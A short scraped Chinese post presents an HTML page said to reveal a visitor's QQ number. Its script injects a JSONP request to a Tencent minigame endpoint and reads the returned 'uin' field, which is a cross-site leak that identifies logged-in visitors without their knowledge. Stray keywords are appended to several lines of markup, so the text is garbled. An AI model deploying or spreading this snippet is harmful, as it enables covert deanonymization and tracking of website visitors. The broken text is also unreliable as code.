據說這個能夠獲取QQ號碼

<!DOCTYPE html>javascript

<html>html

<head>java

    <title>獲取QQ</title>app

</head>ui

<body>htm

<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />ip

<script type="text/javascript">utf-8

    function jC(result) {get

        for(var i in result) {it

            if(i=="uin"){

                alert(result[i]);//循環輸出a:1,b:2,etc.

            }

 

        }

    }

    var JSONP=document.createElement("script");

    JSONP.type="text/javascript";

    JSONP.src="http://dir.minigame.qq.com/cgi-bin/yxs/GetYxsRegTime?callback=jC";

    document.getElementsByTagName("head")[0].appendChild(JSONP);

</script>

</body>

</html>

相關文章
相關標籤/搜索